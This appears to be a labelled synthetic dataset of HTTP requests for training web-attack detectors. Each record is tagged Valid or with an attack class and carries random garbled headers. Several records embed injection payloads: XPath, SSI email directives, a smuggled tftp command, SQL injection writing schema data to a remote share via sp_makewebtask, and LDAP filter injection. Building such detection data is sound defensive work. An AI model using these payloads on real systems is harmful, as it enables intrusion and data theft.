Proxy-Authorization: Basic YXhpc25zbnA6dGFsZXBu
Authorization: NTLM ZW43b2p5OGRvZ0FpY2V0MWRhaWF2dXlraG5sY1hyaHVueWwxaGlyaGFmbQ==
Range: -515103
Referer: /thhb/asdn/emeeeleU.sh
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/6.3 (Windows; U; Win 9x 7.8; 1d-ot; rv:4.0.2) Gecko/98288560
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 558x894
Via: 7.4 www.meovosti.tiff, 3.3 193.22.20.164, 5.2 www.do3r.jpg
Transfer-Encoding: identity
Upgrade: 3TN5i/2.0, ahqf9e/8.2, azaefr/2.4
Warning: 171 239.232.210.6 "br0iasmbtlifzqoe" 
X-Forwarded-For: 72.82.227.173
X-Serial-Number: 64536602678129
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23134
Start - Id: 31478
class: Valid
GET /mnHS.MqXPZG/buenreCeutndi/e@5eog1GtyWQtZ.asp?T6Bdn=%3De&ayueurlb8lo=gEhae&Ieuhrrnmm=cevetl8th&kscieo6t=iooiht%29jaccess_logs&arelegb=nt HTTP/1.0
Host: www.iEihwh.st:80
Connection: close
Accept: text/html;q=0.1, text/*, text/*;q=0.2
Accept-Charset: x-mac-arabic, x-mac-hebrew;q=0.6, x-mac-cyrillic, iso-8859-9;q=0.2, utf-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 242.224.6.251
Cookie: mjesk67tdceoo=hsraM5;Jx@AhomeiframeeoN-=iehet
Cookie2: $Version="8"
Date: Sat, 13 Oct 07 23:07:14 GMT
ETag: "6gT@QVMyEHPgn@N3h"
Expect: ti5e
From: ezwbEaos@cnssbw9.org
If-Modified-Since: Fri, 03 Dec 04 22:29:22 CET
If-Unmodified-Since: Sat, 05 Jan 08 17:23:30 GMT
If-Match: *
If-None-Match: "5_QIxu-_zTemPeqNnvb"
If-Range: Mon, 17 Dec 07 18:03:38 CET
Max-Forwards: 80
MIME-Version: 7.9
Pragma: RlaI=r
Proxy-Authorization: Digest nc=Dbc2bcCc
Authorization: Basic cmJlZTpoaTZpcmpPdA==
Range: 5020-
Referer: http://fwIn.biz/hq0ttv1/or0f/nvrSitl/eE6os.txt
TE: trailers
Trailer: Connection
User-Agent: hnfi4/5.8
UA-CPU: Sparc
UA-Disp: 4970,305,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 389x351
Via: 2.0 www.lwoceuhh.tiff
Transfer-Encoding: Sczz
Upgrade: edf/0.2
Warning: 334 186.45.95.188:492 "4a7905aupt5ae" "Thu, 09 Aug 07 05:54:53 GMT"
X-Forwarded-For: 159.122.226.252
X-Serial-Number: 1337403720563308
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31478
Start - Id: 50076
class: XPathInjection
POST /Lncem40isjnNln/dlb6e0ermoditmes/4K8Z/jqp0M4IgmCu/nz/Ao73luIXD@/t-BmkELiSa/eT3Il8binputtxml17Etz/fsaU2etusit/an4shessssjaiSeic5bd.mdb? HTTP/1.0
Content-Length: 244
Content-Language: mbetseh
Content-Encoding: deflate
Content-Location: /aaiwmgua/it0os/hrWDfe/nalqdm2e/Deashngn.shtml
Content-MD5: SGJtaHRzdGV0ZWxPeWdocw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 12 Apr 06 14:04:29 UTC
Host: www.c1ettDcd2m.com
Connection: mgpg7d
Accept: image/*, application/x-tar;q=0.0, text/plain
Accept-Charset: iso-8859-1, x-mac-cyrillic
Accept-Encoding: gzip;q=0.7, deflate;q=0.5, deflate, identity, gzip
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 88.57.0.63
Cookie: IE5m=emetd;9etad1ye=eval ;ganrqeosr=qu;akiaccess_logR8passthru=eoeoset']    |   P |    //user[     name/text(   )   ='Hjfpv
Date: Mon, 13 Sep 04 12:11:40 GMT
ETag: "CgWrOYRDBY9fQlI"
If-Modified-Since: Sat, 14 Jun 08 09:50:44 GMT
If-None-Match: "_ZXpXPJgeVyRCxjFSP"
If-Range: *
Max-Forwards: 23
MIME-Version: 1.8
Pragma: rrzxOgma=aesoRyhk
Authorization: Basic c3RpcGJtZTpUU254YXR4Mw==
Referer: /nogsdaoh/oOedde/cgphuai.mpeg
TE: deflate;q=0.7,deflate,gzip
User-Agent: dh9lel (9M8AaubBj; rP.IwPWS-K; eLH@yg)
Transfer-Encoding: deflate

eyanetoAws5oc=wj&wSgoit=yrcistwtpoo&icdstse=aiqgxpzK&lnhuedcaulxcofe=LneaN7rIn&61t=ptllogermochaa \r&xu59N2f-=tt5treLepnshutdown&dewmq4sewinSu=36320004&ols=9422&758neTo=mJ6gFP&ewi=q&tdninos=74148346&ieputs=iam&iei=993746810&oamtsleMe9In9t=eee

End - Id: 50076
Start - Id: 39396
class: SSI
GET /eyionCad5ilraRn/shutdownxp_pl2AXUXid5UN/3EqiLLT/5PnN454wUl9ZC/eq7aZrghsna.html?havingBPEd=rqssRncsns%3Bisn&ia5s8hrat1vadoa=%3C%21--%23email+fromhost%3D%22www.0luhce.com%22+tohost%3D%22mailbox.rsn.com%22+message%3D%22xBaush+muhIrjp+4l+a8hihn%22+fromaddress%3D%22kucaa.com%22+toaddress%3D%22ioa.oTm5.com%22+subject%3D%22ik%22+sender%3D%22in.com%22+replyto%3D%22cnsc9.com%22+cc%3D%22emw%22+inreplyto%3D%22te+dstl+semve%22+id%3D%22oyyxnmail%22+--%3E&tBH2iDsiaga=sm%2Boi+sgn%3Fonet HTTP/1.0
Host: www.fauDrcuave.com
Connection: rneesril
Accept: */*
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: gzip;q=0.5, compress, identity;q=0.3, deflate;q=0.7
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 251.73.199.230
Cookie: asbcdRosmh2jioI=<n;GdnuroRyo=IaaEict;r53=Seo
Cookie2: $Version="69"
Date: Thu, 15 Jun 06 07:00:32 CET
ETag: "4Brn_CPTrEZ4KqY"
Expect: TNjt=oHed
From: gdiexzng@dnnsS.com
If-Modified-Since: Mon, 05 Jun 06 08:00:03 CET
If-Unmodified-Since: Tue, 18 Sep 07 24:40:18 UTC
If-Match: "@zivi-Q4_C9@k7b9"
If-None-Match: "TgsC5QJG10W@lbZz"
If-Range: Thu, 09 Oct 08 09:13:41 GMT
Max-Forwards: 59
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: reenr ueer=altyt2
Authorization: Basic bHRzaWV0dGU6bWVpcnM5
Range: 32-500
Referer: http://www.qhegr.uk/hit4l.zip
TE: chunked,deflate
Trailer: Accept
User-Agent: Mozilla/0.6 (X11; U; Solaris 4.7; ua-aj; rv:9.1.4) Gecko/52263633
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: 4.5 www.aasou1ta.jpeg, HTTP/1.2 www.iarc.jpg:161, FTP/9.6 www.lhonea.js:2
Transfer-Encoding: compress
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 807 171.93.211.15 "9neAr" "Tue, 14 Nov 06 22:05:25 UTC"
X-Forwarded-For: 193.181.203.122
X-Serial-Number: 2597611
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39396
Start - Id: 16261
class: Valid
GET /p96/peeanlln4iAaseyteat/3z4YbodyGp0mo/addjMeFa57bct.mspx?RmH2gEing11Y=ennaW&vxechyp2gTiu=hN&RtmpA-jrBQDLXobject=033&oetti=126737&epl=toeeye7azUaEt&9boehdso4nnx=droo&sn=erxewpw9Odino&AmhE6s5=yfj7&3wgettelnetND3fKSlP=tinb5osceai HTTP/1.1
Host: www.efto.de
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 252.250.241.161
Cookie: hvCperlXshutdownH=2ase
Cookie2: $Version="3"
Date: Sun, 13 Nov 05 21:10:42 CET
ETag: "CXANZw0Rk-KOgM1Jc6X."
Expect: 100-continue
From: 5oSecmlh@N6omaecn.biz
If-Modified-Since: Mon, 29 Oct 07 01:52:14 GMT
If-Unmodified-Since: Fri, 06 Jan 06 24:54:07 UTC
If-Match: "6ywM@.IODDCaflNmM"
If-None-Match: *
If-Range: *
Max-Forwards: 435
MIME-Version: 6.1
Pragma: R=riweishs
Proxy-Authorization: NTLM cmVlZXlObnVmblRkMmxvdGdSMG9sZXBud296dHdUeXFFdGNldVl6MGk=
Authorization: chiiu p5rnnt=nlui
Range: 767-,-23616
Referer: http://Nerlt.ch/I9ai/owEy/jpeai/aonkpme.php3
TE: deflate,trailers,trailers
Trailer: Max-Forwards
User-Agent: raCen (oxNE1HfS; rSXcs6; oe44aW3uSb; bszxa1-s)
UA-CPU: 68000
UA-Disp: 7368,0111,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2602x876
Via: 8tsyst/3.8 65.7.250.16
Transfer-Encoding: p9ee
Upgrade: pno/2.0, 92s3t/7.4, hio/3.0
Warning: 593 www.czyane.jpg "hnn6i2Nors" "Sun, 24 Jun 07 01:56:04 GMT"
X-Forwarded-For: 136.200.162.240
X-Serial-Number: 1613720445559
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16261
Start - Id: 28191
class: Valid
GET /rwRicuoY/tn.asmx? HTTP/1.0
Host: 25.41.116.28:219
Connection: oa4Ccqic
Accept: */*;q=0.5
Accept-Charset: iso-8859-1, x-mac-roman, x-mac-hebrew, iso-8859-7;q=0.6, x-mac-arabic
Accept-Encoding: gzip
Accept-Language: *;q=0.7
Cache-Control: cogttx='hepTgd'
Client-ip: 140.141.64.90
Cookie: lonqoeIae6njh=628194;ehDrieemR=2b@TvP@wup;smtnde7ECose=07;GidstoSvyn=70217795;mlhiEfswsixxn=26409520;nullcKfvscriptvxSrm1xterm=738097
Cookie2: $Version="808"
Date: Tue, 10 Jun 08 11:06:27 UTC
ETag: "HAKS-GZxAfZFJzHFo@3"
Expect: 100-continue
From: haidri@m6zcet8gA.ch
If-Modified-Since: Sun, 16 Mar 08 11:01:15 CET
If-Unmodified-Since: Thu, 22 Apr 10 08:50:12 CET
If-Match: *
If-None-Match: "ZmxW-M0M5dHBfH5HT"
If-Range: "FO2bi@mhpNrvBJbR"
Max-Forwards: 333
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: eto8 uEecs=rhne5mt
Range: -569,-376,5-
Referer: /sio4i5o3/Nragloue.cgi
TE: deflate;q=0.6
Trailer: If-None-Match
User-Agent: yfemn (6ITNl.; hUdvJJP3W1; e.byJkIvSW)
UA-CPU: MIPS
UA-Disp: 0207,3028,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 929x735
Via: 9.3 74.218.204.210, 6.5 www.cf5nre6.jpg, 4.3 www.26aa.jpg:5
Transfer-Encoding: gzip
Upgrade: eac/6.6, 5tt/5.8, dUof/8.5, yx7bfp/7.8, ismoli/1.8
Warning: 941 204.125.32.112 "Rsze" 
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 3105222216298089545
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28191
Start - Id: 12568
class: Valid
GET /gk2/rtnidencrtntv3.png?KobjectE_g=58126&oea=9O6qzvMFV&d56ih0i=g&drsnetsihgKi=nus&nehie8rzo6d=p%24rspewt+&S_1CpyG=eyne&Jqcatv.xiframeevals89=33131395&gusnjhn=rcp&oEPn9ci4=iropqd&ouodaeorInno9h=retswitrftststzu7n&vpdcekmiBeLa=nViurglguFl2ztroe&cae=rj7R%40MaapE&crzeNtmpt=enerpsubebE HTTP/1.0
Host: www.uauysiqlsu.de
Connection: Ochnd4Pe
Accept: video/*, text/*, application/*
Accept-Charset: iso-8859-8;q=0.0, us-ascii;q=0.8, euc-jp;q=0.3, windows-1253
Accept-Encoding: *
Accept-Language: SnEht-ewDaw;q=0.0, e-Tu, 4Eethiq-X9gamh;q=0.7, adr-ra
Cache-Control: dhh='ahtniass'
Client-ip: 250.98.12.167
Cookie: uthke=D;nEehpfo=Nl;aalgeadcuIiYa=67549180;oahgtc=@http=OhxelATchildral
Cookie2: $Version="79"
Date: Mon, 18 Sep 06 07:32:55 GMT
ETag: W/"yrlDJs1oar.qn35"
Expect: 100-continue
From: cOcie@dtseq.net
If-Modified-Since: Sat, 19 Dec 09 02:38:02 GMT
If-Unmodified-Since: Sat, 27 Jan 07 02:50:10 GMT
If-Match: "SvhSwG86WiMxCcKQX"
If-None-Match: *
If-Range: "Clqjz5pbnEPWmnd7w2BL"
Max-Forwards: 2
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iCAy"
Authorization: Digest opaque="cdEoihI"
Range: 941-,7-5
Referer: /tbafehrn/a0iia/Nn8t.bin
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/0.0 (compatible; Konqueror/1.2; Win 9x; eroEnsu)
UA-CPU: 68000
UA-Disp: 3658,3398,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 366x415
Via: HTTP/5.1 43.29.54.205
Transfer-Encoding: gzip
Upgrade: rls/0.5, mx3atf/0.8, reyvel/3.5, iaelo/7.5
Warning: 299 www.sebroiht.htm "eaob" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12568
Start - Id: 7799
class: Valid
PUT /DNwhSUs/rmeKqbgsoundgywcmdo/OvdbH74/6saTe/s5XMk/hteebtewtt/ass39aeivn64thncrld/t1odo0ta/@6wY6L7W4z.swf? HTTP/1.1
Content-Length: 287
Content-Language: n,laso,st2rnobs
Content-Encoding: identity
Content-Location: /sicmo.jpg
Content-MD5: a3dnZUhyemVMc25pb3RlYw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 18 Mar 04 05:51:02 GMT
Last-Modified: Mon, 27 Nov 06 24:58:33 UTC
Host: 7.76.112.152:80
Connection: bsaewq
Accept: */*
Accept-Charset: x-mac-arabic, windows-1257;q=0.1, ks_c_5601-1987;q=0.0
Accept-Encoding: 
Accept-Language: f-itasofh;q=0.7, na-iZe;q=0.4, 6r-jpealiW
Cache-Control: max-age=7
Client-ip: 248.78.197.68
Cookie: eluxendfoc4i=576056;tTcSe=>gao we]eoera
Cookie2: $Version="5"
Date: Mon, 05 Feb 07 04:40:10 GMT
ETag: "kyEeRm@mcrw1zHjoII"
Expect: 100-continue
From: msDNtTe@mtt5jy.de
If-Modified-Since: Mon, 06 Sep 04 06:45:20 CET
If-Unmodified-Since: Thu, 21 May 09 11:19:36 CET
If-Match: "T4qbzxVD6pwcJ-_zQRII"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 8.5
Pragma: at8mmbf='ayh'
Proxy-Authorization: Basic VHNkZGF4OmJlbDVlcw==
Authorization: Basic YWRwYWFzOnFmc2lt
Range: -43411,-175805,6-
Referer: http://www.spea4nx.fr/ikUcr/beonSp/knier/eCyf/Cneo4.ace
TE: deflate;q=0.2,trailers
Trailer: If-Range
User-Agent: Mozilla/9.8 (compatible; MSIE 7.5; Open BSD i386; jei8aom; vactowidr; bDasla2rpa)
UA-CPU: StrongARM
UA-Disp: 179,7168,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 669x1617
Via: 4.8 89.72.48.85, HTTP/4.6 www.w5ta.js
Transfer-Encoding: compress
Upgrade: hZ1Tjt/9.1, t5sa/5.7, ibgt1/8.3
Warning: 240 www.9cth.tiff:70 "nahs" "Fri, 31 Aug 07 19:06:50 CET"
X-Forwarded-For: 202.225.233.245
X-Serial-Number: 27066605
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

eomaS1zra7eu=deH@vestyleandeeealogr mcat&6resu1t5qAhnd=33&Oga8lanPHnxmh=8190675&er=rEHaJxf0&ea3pxql=[psuhttps&dfhTealal9vn=hd&ac=9895297&ocyscript=Iexecns|sT4hiE4&aakdwn2sswi=mailuteo samn7i&w265rfXAJR=nUow&rgStoaswe=1020584&k6xmlO49Q=207SFe-4&limrifrseE=7&lsihr6=mgS3dt8terpo@en

End - Id: 7799
Start - Id: 44628
class: OsCommanding
POST /lLHzVx0v.O0ej/m9rNCEa3f/eQ.pl? HTTP/1.1
Content-Length: 150
Content-Language: h,e,h
Content-Encoding: deflate
Content-Location: /sthcj71/8tmuys/siSe5s.asp
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 10 May 05 08:34:30 GMT
Last-Modified: Wed, 16 Dec 09 17:38:53 GMT
Host: www.an8l.fr:08
Connection: eslQ
Accept: */*;q=0.6
Accept-Charset: iso-10646-ucs-2;q=0.2, euc-kr
Accept-Encoding: 14.32.73.68  ;    tftp 192.168.10.33 test.txt
Accept-Language: a-ocniW, ch-ia7eosn, eo9-mtsus0Oo
Cache-Control: max-stale
Client-ip: 213.120.197.202
Date: Sun, 23 Dec 07 17:41:08 CET
If-Modified-Since: Tue, 11 Mar 08 04:29:01 CET
If-Unmodified-Since: Sat, 20 Nov 04 19:40:28 UTC
If-None-Match: "8EDk8IqQlhb1vcJg.Jk4"
If-Range: *
Max-Forwards: 52
MIME-Version: 2.7
Proxy-Authorization: Basic aVFpOW5lOmxkZW1ubHM3
Authorization: iSeHoo sAodoq=Ssloiigo
Referer: http://www.tEniErd.it/bT7u/eiebwnu/tte5obi.fgf
TE: chunked,gzip
User-Agent: udjgn4ust (aLx7rQO)
UA-CPU: MIPS
UA-Disp: 365,028,32
Transfer-Encoding: gzip
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

rtehikdnna=z&D6k1wsteqoP=9517&oAstauw=]zrt\&hirwTerpe=5txp_em&6Iear=abUf.4CN3jv&9d4r1ya7=jopg\3&rieWenw=tFV-vh@_70rl&sbgyowindow.openkdc.=3sft

End - Id: 44628
Start - Id: 41040
class: SqlInjection
GET /_R4/u0P/sHwxQUxihpmbtVl/qWf_jEryazrG.gif?awcley=6besslea&dqsn=oe%40&rsdaso2r1=%27%3B+++++EXEC+++++master..sp_makewebtask++%22%5C%5C251.100.86.183%5Ch9naeS%5Cjde.png%22%2C+++%22SELECT+++++*++FROM++++INFORMATION_SCHEMA.TABLES%22&Ngawnslweahx4=76236&ii7obt=tb8muoaleee&8Bn5tP3scriptjEyr=tfhe&oefooma=deletetihc%7Cmttfa%27dttmailexiD&Nejuvm=hn7ao&oInfa=1143085 HTTP/1.0
Host: 66.169.25.182:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: 2wC4me-2iOeyad, ties-smcl;q=0.0, sbrza-ntlTyd, src-e
Cache-Control: no-transform
Client-ip: 132.226.247.132
Cookie: cron=/a wlIactrobai;tqsnnr=sKXKISCYdWvv;agnrg=s0;kwyeuqfoge=reMT_le;ihHpe=e
Cookie2: $Version="6"
Date: Tue, 08 Sep 09 01:34:45 UTC
ETag: W/"_WrR1Ly1ZlOqxyWv2v9n"
Expect: 100-continue
From: i4axWsi@dEthgse.cz
If-Modified-Since: Sun, 21 Dec 08 20:35:04 UTC
If-Unmodified-Since: Mon, 08 Aug 05 02:47:58 GMT
If-Match: *
If-None-Match: "RpkovYZmfpWLjLn"
If-Range: "zRu2NRpV9XxMIV6l6ykf"
Max-Forwards: 98
MIME-Version: 1.6
Pragma: dharcigt=ht
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: tlsTrg fcoEr=nuhn
Range: 7-04,570-
Referer: http://yTFa.gov/QaoEg5iT/ow7e/otfOssta/o9an.ace
TE: deflate;q=0.8
User-Agent: ipsecscjyhee
UA-CPU: PowerPC
UA-Disp: 3796,7783,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 381x817
Via: 8.6 188.137.176.139, FTP/2.1 153.226.221.165:3051
Transfer-Encoding: gzip
Upgrade: mme/2.4, 09a/7.3, yAr/5.1, ihhdl/6.4
Warning: 886 225.6.48.99 "n1xne5msKpismeoarx" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 41040
Start - Id: 16338
class: Valid
GET /enOo8avbGfced/o9/julZ1RP.c8w9IvVZLd/sEW2lQjIiNUD-.cfm?5aaaraumheEidm=ddtre&sowhE=T%3Dn&P4Ptelnet-4dhtpassand=wGd3.MZL&ymiahCtweednsh=22&fent=4qxoits&voa=iiitenNyat%26%25uogLop0dxmlt&s9cOttcsbao5edT=3&envIjxNEnhsDlt=eeRLJy HTTP/1.1
Host: www.tcvth2.de
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: compress, identity, identity
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 33.226.87.182
Cookie: ninernsN=ittph;9lduaEa=loHalei)ei0
Cookie2: $Version="88"
Date: Sun, 24 May 09 15:37:42 GMT
ETag: W/"i_852kNFC8hsY6K2lVEr"
Expect: 100-continue
From: EMlse@n8Gtdetp8r.ch
If-Modified-Since: Tue, 24 Mar 09 12:38:47 GMT
If-Unmodified-Since: Sun, 30 Nov 08 02:53:12 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 48
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM dGJlcjJlb1l3ZW9hc25zZHJlMHQ5ZW5pZkRuTGRsaWU=
Authorization: Digest qop=auth-int
Range: -652120,9-,091-
Referer: /aogt/Titctbhh/9yaa/pzsatm.conf
TE: deflate;q=0.5
Trailer: Upgrade
User-Agent: uecfN (rufqA0hzI; sNniD55; eZwFhlje)
UA-CPU: Sparc
UA-Disp: 101,468,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7557x889
Via: sfSuxm/7.1 www.nesnc.tiff, rsnwR5/1.0 216.60.213.85, 6.2 www.edIqln.shtml
Transfer-Encoding: deflate
Upgrade: ltsn/5.8, h5e/2.9, nabeo/7.5, tnn/0.6, pr74/9.1
Warning: 799 www.moaimt.jpg:7272 "O1enqniO8" "Mon, 09 May 05 14:13:25 CET"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 6166781
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16338
Start - Id: 21697
class: Valid
GET /Eetciuexec/thveuoT/MIreplaceX9leservices.tiff?do7scriptRfZE0=i1-uOM&ihssMe6owich=6&Lposition@LpzA6Utw=As1rHraae%25w1&ultl=6sthi2thsrM&Njhtacces@E_S=65&teua90=SssppetE008nomo&eraee5=9348615 HTTP/1.0
Host: www.9msotEn8R.org
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-japanese;q=0.4, iso-8859-6;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: nlhco='ystetr'
Client-ip: 19.23.184.246
Cookie: hshlled2oelt=82;cmdJyselectrq30mLo5=tcat>beytli47t;seiosbnend=gk7aBPC;nssjieettnt=i6ed;hzcentaoibastx=g6
Cookie2: $Version="9"
Date: Wed, 12 May 04 13:28:03 GMT
ETag: "sD5DT9hbkp6_Id0xi"
Expect: aoSe=shro;Anls43no=Tmghoa
From: oteJo@zdjaie.biz
If-Modified-Since: Sat, 05 Nov 05 02:06:27 UTC
If-Unmodified-Since: Mon, 25 Jan 10 02:25:40 CET
If-Match: "@slnfGhoht-bB.966r"
If-None-Match: *
If-Range: *
Max-Forwards: 008
MIME-Version: 5.7
Pragma: are8eW=ttt5o
Proxy-Authorization: Digest response="2A1e87269Dff27cBc5fF603815fb175a"
Authorization: Basic bmxsb286bmd5cmRvbzg=
Range: 6854-805189,4305-14775
Referer: http://www.s0uy.net/eyin/Ojaee/ns5tT.wmn
TE: gzip;q=0.5,chunked,chunked;q=0.8
Trailer: Via
User-Agent: 8ipuecudhu (l9mGom_QJs; e0o6FSiDd; aOMbVeYqu; kc1-KCKrA; k-F3sFV)
UA-CPU: StrongARM
UA-Disp: 299,773,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 664x378
Via: 1.9 167.17.97.162, sSuQ6n/9.0 www.8lqaD.gif
Transfer-Encoding: gzip
Upgrade: Abae/9.2, 23ehie/8.6, esDl/9.5, y7tfvd/4.7, aiC/7.6
Warning: 456 16.111.210.179 "htasayeJyno" "Fri, 12 Nov 04 12:32:53 CET"
X-Forwarded-For: 36.156.86.13
X-Serial-Number: 07885
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21697
Start - Id: 37144
class: LdapInjection
GET /Tmupdate_TZ5fashutdownC.VLP/yHX2/6D/CUz4D4i/ced@MYpyfzr6Ekic0/i-uGACfM4DL1A/v.qXUYHYgPSiB8sVH/tehvjene/na9ja2T_7pWJ/8K.GdxnDPKG.v.p8/rpositiona.asp?RehYtcv=rnreeti%28fn&geqsdvtr0=ens&9dt2s=9624448902&dsxdcnbba=%29+%28+%7C++++%28displayName%3Dhad*%29++%28name++++%3Dhad*+%29%28++mail%3Dhad*+%29&yhnaitxSU9=%27eWaodfrom&mtphT1n=ero3&J9W0=sI+&scia=0D_K%40nEd8g&Ldflyca=ahupdate5 HTTP/1.0
Host: 183.33.28.14
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-age=9
Client-ip: 186.207.13.158
Cookie: rite6egi=82199;eeiwtsetai=44391;aazolSc=itrt+;zUnlqLoas8=nari];UnsNrde=el02pnhfeyne5ohh;XdropwheresckDvPC=bit
Cookie2: $Version="395"
Date: Thu, 16 Feb 06 14:15:01 CET
ETag: W/"RxU5d45Z4IV2969"
Expect: 100-continue
From: m0oefy@tNuodgrTta.org
If-Modified-Since: Sat, 07 Aug 04 21:33:39 UTC
If-Unmodified-Since: Thu, 29 Apr 04 22:21:01 CET
If-Match: "1a6Mi1dl.UsE3pbzY"
If-None-Match: *
If-Range: Wed, 13 Jun 07 10:00:49 GMT
Max-Forwards: 848
MIME-Version: 8.7
Pragma: p0lumc='caall5el'
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Digest uri=http://www.bwGo.de/nowpT/iuogtiky/ircnr/anteg8n/ob2bnei.conf
Range: 88347-,9-
Referer: http://bbh9.org/4dEaor.jsp
TE: trailers,chunked;q=0.8,gzip;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/4.4 (Windows; U; WinNT 5.0; nl-yc; rv:3.7.4) Gecko/20382883
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: HTTP/6.1 www.ldat.gif, HTTP/3.5 www.am5thman.js, 7.2 202.201.165.2:325
Transfer-Encoding: gzip
Upgrade: 39se/0.8, sEeahl/6.8, 4chs1h/1.6, l5INot/1.9, a0kxka/1.4
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 248.38.25.114
X-Serial-Number: 4738976742686812
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37144
Start - Id: 32159
class: Valid
GET /rmeYrft0awp-gXjt4N/5hbb0WlGm/iault3eRnod/py@yq31v9u8u/neioe/srst6eiypaqIa8rbl/s8ln9thAnefzlE.shtml? HTTP/1.0
Host: 53.224.84.107:80
Connection: mdt1x
Accept: text/*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: osbRsrN-gs3ncnec;q=0.3, ssbuNbzm-en;q=0.9, ean-p;q=0.8, 4t4p-ejge, zsugo8nV-3rs;q=0.0
Cache-Control: max-age=0
Client-ip: 225.25.216.125
Cookie: neonsx5i3heaet=fsidn
Cookie2: $Version="79"
Date: Mon, 24 Jul 06 06:42:08 UTC
ETag: W/"9g6bRICUoKkr.mgn"
Expect: 100-continue
From: nysnc@tRhdi.ch
If-Modified-Since: Sun, 13 Nov 05 18:36:38 GMT
If-Unmodified-Since: Sun, 20 Sep 09 07:28:10 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 04 Oct 08 17:22:32 UTC
Max-Forwards: 25
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest nc=3A5E1cB7
Authorization: Basic cmFkcDpFdmF1YWJkbw==
Range: 55063-6304,280-5,006-574457
Referer: /nlrn.png
TE: trailers
Trailer: Referer
User-Agent: Mozilla/2.9 (Machintosh; U; PPC Mac OS X 4.5; Ao-Qt; rv:6.7.3) Gecko/38532741
UA-CPU: Sparc
UA-Disp: 3488,5746,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 320x815
Via: 3.2 www.sv9h.jpeg, 1.3 www.turntlr.jpg:900
Transfer-Encoding: deflate
Upgrade: agy/0.3
Warning: 953 85.108.253.61 "sa7gxeiapkth" 
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 30016266128
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32159
Start - Id: 26214
class: Valid
